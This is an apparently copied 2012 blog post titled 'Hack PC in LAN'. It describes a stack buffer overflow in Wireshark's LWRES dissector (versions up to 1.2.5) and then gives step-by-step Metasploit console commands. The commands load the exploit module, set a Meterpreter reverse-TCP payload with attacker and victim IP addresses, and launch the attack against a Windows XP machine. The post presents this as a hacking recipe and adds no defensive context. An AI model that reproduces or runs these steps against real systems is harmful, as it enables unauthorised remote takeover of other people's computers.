Warung Online
Headlines News :
mas template
Home » , » Hack PC in LAN using Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow

Hack PC in LAN using Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow

Written By Trik Cari Duit on Minggu, 27 Mei 2012 | 16.03

The LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through 1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer overflow. This bug found and reported by babi. This particular exploit targets the dissect_getaddrsbyname_request function. Several other functions also contain potentially exploitable stack-based buffer overflows. The Windows version (of 1.2.5 at least) is compiled with /GS, which prevents exploitation via the return address on the stack. Sending a larger string allows exploitation using the SEH bypass method. However, this packet will usually get fragmented, which may cause additional complications. NOTE: The vulnerable code is reached only when the packet dissection is rendered. If the packet is fragmented, all fragments must be captured and reassembled to exploit this issue

Exploit Targets
Wireshark 1.2.5

Requirement
Attacker: Backtrack 5
Victim PC: Windows XP

Open backtrack terminal type msfconsole


Now type use exploit/multi/misc/wireshark_lwres_getaddrbyname
Msf exploit (wireshark_lwres_getaddrbyname)>set payload windows/meterpreter/reverse_tcp
Msf exploit (wireshark_lwres_getaddrbyname)>set lhost 192.168.1.2 (IP of Local Host)
Msf exploit (wireshark_lwres_getaddrbyname)>set rhost 192.168.1.56 (IP of Remote Host)
Msf exploit (wireshark_lwres_getaddrbyname)>set target 4
Msf exploit (wireshark_lwres_getaddrbyname)>exploit



Before running the exploit command, let say that the attacker now still collecting data using their Wireshark tool like the picture below.

Share this article :

0 komentar:

Speak up your mind

Tell us what you're thinking... !

Bisnis Hot
Bisnis Hot
 


Copyright © . Tips N Trik - All Rights Reserved
Proudly powered by Blogger